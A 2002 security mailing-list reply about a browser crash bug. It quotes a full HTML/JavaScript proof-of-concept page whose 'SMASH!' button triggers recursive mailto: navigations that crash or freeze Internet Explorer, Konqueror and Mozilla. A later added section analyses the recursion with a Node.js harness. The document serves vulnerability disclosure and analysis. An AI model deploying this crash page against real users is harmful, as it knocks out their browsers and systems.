Re: Buffer Overflow with all versions of Internet Explorer and JavaScript.
From: Scott Mackenzie (smackenz@sdf.lonestar.org) Date: 06/03/02
From: Scott Mackenzie <smackenz@sdf.lonestar.org> To: vuln-dev@securityfocus.com Date: 03 Jun 2002 00:47:52 +0100
After a few minutes testing it seems this does not only affect Internet
Explorer but also the following browsers:

- In KDE's Konqueror latest version it segfaults the browser instantly
- In Mozilla 0.99 it causes a Denial of Service situation against the
  machine with 100% CPU usage, and some crazy hard drive accessing until
  the process is killed

Other information:

- Netscape 6 series latest version does nothing when SMASH! is clicked
- Galeon latest tries to mail a rather long email address, but the browser
  itself is unaffected

Test System:
Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686
---------------------------------
Scott Mackenzie
Cybernetics & Virtual Worlds (2)
Bradford University
http://smackenz.zapto.org
---------------------------------
On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
> On 28/07/1999 I discovered a stack buffer overflow caused by, up to now,
> all versions of Internet Explorer.
> On many Windows 98 systems it makes it necessary to restart the machine, since
> it seems to me that it is left without memory.
> It has only been tested on several 5.x versions of IE on Windows NT
> Server SP6 and Windows 98 Second Edition. As I said before, on Windows 98
> I had to restart it by force.
> Is it possible to execute arbitrary code using the variable company from
> the example?
>
> // Internet Explorer 5.00.2314.1003 on Windows NT 4 SP6
> // Internet Explorer 5.00.3500.1003 on Windows 98 SE
>
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
> var company;
>
> crear();
> address="s0t4ipv6@shellcode.com.ar";
> soporte();
> }
> function soporte(){
> var soporte="bill@mocosoft.com";
> window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
> // window.location=company; // this line also causes the bof.
> close(hacerMail());
> }
> function crear(){
> company="shellcode here?\n"; // I don't think so.
> }
> </script>
> <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
>
> Regards.
>
> - Internet is harmful to your health -
> - Law No. 127.0.0.1
>
> Matias Sedalo
> http://www.shellcode.com.ar
>
> s0t4ipv6@shellcode.com.ar
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> .......................................
>
>
>
>
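
The call structure of the quoted page, as an added example that is not part of either post: `soporte()` passes `hacerMail()` as the argument to `close()`, and `hacerMail()` calls `soporte()`, so one click starts unbounded mutual recursion. The harness is constructed for Node.js; `runCallGraph`, `windowStub` and the depth counters are hypothetical names, and it shows a current engine ending the recursion with a catchable `RangeError`. That this recursion explains the crashes reported in the thread is an assumption, not something either message confirms.

```javascript
// Constructed harness: same call structure as the quoted page, with the
// browser objects replaced by stubs so it runs under Node.js.
function runCallGraph(maxRecorded) {
  const navigations = [];   // stands in for assignments to window.location
  let depth = 0;            // live hacerMail() activations
  let deepest = 0;          // high-water mark of depth
  let company, address;     // play the role of the page's implicit globals

  const windowStub = {
    set location(url) {
      // Record only the first few URLs so the harness stays small in memory.
      if (navigations.length < maxRecorded) navigations.push(url);
    },
  };
  const close = () => {};   // stub for window.close(); never actually reached

  function crear() { company = "shellcode here?\n"; }

  function soporte() {
    const cc = "bill@mocosoft.com";
    windowStub.location = "mailto:" + address + "?cc=" + cc + "&subject=" + company;
    // The argument is evaluated before close() runs: this re-enters hacerMail().
    close(hacerMail());
  }

  function hacerMail() {
    depth++;
    if (depth > deepest) deepest = depth;
    crear();
    address = "s0t4ipv6@shellcode.com.ar";
    soporte();
    depth--;                // only reached if soporte() ever returns
  }

  let outcome = "returned";
  try {
    hacerMail();
  } catch (e) {
    // A modern engine bounds the call stack and reports exhaustion as RangeError.
    outcome = e instanceof RangeError ? "RangeError" : "other:" + e.name;
  }
  return { outcome, deepest, recorded: navigations.length, first: navigations[0] };
}
```

Setting a URL does not stop script execution, so nothing in the original page breaks the cycle; the engine's stack limit is the only bound.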